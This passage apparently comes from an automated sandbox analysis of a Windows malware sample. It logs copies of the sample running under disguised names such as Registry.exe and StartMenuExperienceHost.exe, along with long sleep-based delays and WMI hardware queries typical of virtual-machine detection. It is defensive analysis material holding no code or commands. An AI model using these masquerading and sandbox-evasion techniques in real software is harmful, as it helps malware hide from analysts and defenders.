            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599890
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599781
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599672
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599562
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599453
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599343
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599234
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599125
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599015
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598906
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598797
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598687
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598578
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598468
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598356
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598248
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599656
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599547
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599437
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599328
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599218
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599109
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598890
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598781
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598671
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598562
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598453
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598343
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598234
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599890
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599781
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599672
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599563
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599453
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599344
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599234
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599125
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599013
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598906
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598797
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598686
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598578
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598267
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598141
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599654
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599421
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599094
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598969
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598859
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598750
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598640
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598422
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWindow / User API: threadDelayed 974
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWindow / User API: threadDelayed 1030
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 411
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 609
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 364
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWindow / User API: threadDelayed 367
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 367
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 870
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 462
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 495
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 1582
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 3385
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWindow / User API: threadDelayed 1304
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWindow / User API: threadDelayed 3824
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 1469
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 2490
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 1930
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 2373
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 3300Thread sleep count: 974 > 30
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 3300Thread sleep count: 1030 > 30
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 5912Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 5896Thread sleep count: 411 > 30
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 5676Thread sleep count: 609 > 30
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 3220Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 4508Thread sleep count: 366 > 30
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 7140Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 6792Thread sleep count: 364 > 30
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5176Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 2036Thread sleep count: 222 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 3052Thread sleep count: 165 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 7012Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 4052Thread sleep count: 367 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 3004Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5960Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5764Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 1460Thread sleep count: 367 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5388Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7068Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 2968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 6316Thread sleep count: 870 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 4780Thread sleep count: 115 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 672Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5272Thread sleep count: 462 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 6568Thread sleep count: 495 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 1424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599890s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599781s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599672s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599562s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599453s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599343s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599234s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599125s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599015s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598906s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598797s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598687s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598578s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598468s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598356s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598248s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 6492Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 4188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5924Thread sleep count: 1304 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 1908Thread sleep count: 3824 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599875s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599765s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599656s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599547s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599437s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599328s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599218s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599109s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599000s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598890s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598781s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598671s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598562s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598453s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598343s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598234s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 1540Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 4052Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912Thread sleep count: 1469 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912Thread sleep count: 2490 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -13835058055282155s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599890s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599781s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599672s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599563s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599453s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599344s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599234s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599125s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599013s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598906s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598797s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598686s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598578s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598267s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598141s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2308Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7028Thread sleep count: 1930 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 1216Thread sleep count: 2373 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599875s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599765s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599654s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599531s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599421s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599312s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599203s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599094s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598969s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598859s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598750s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598640s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598531s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598422s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598312s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -598203s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 4440Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7072Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
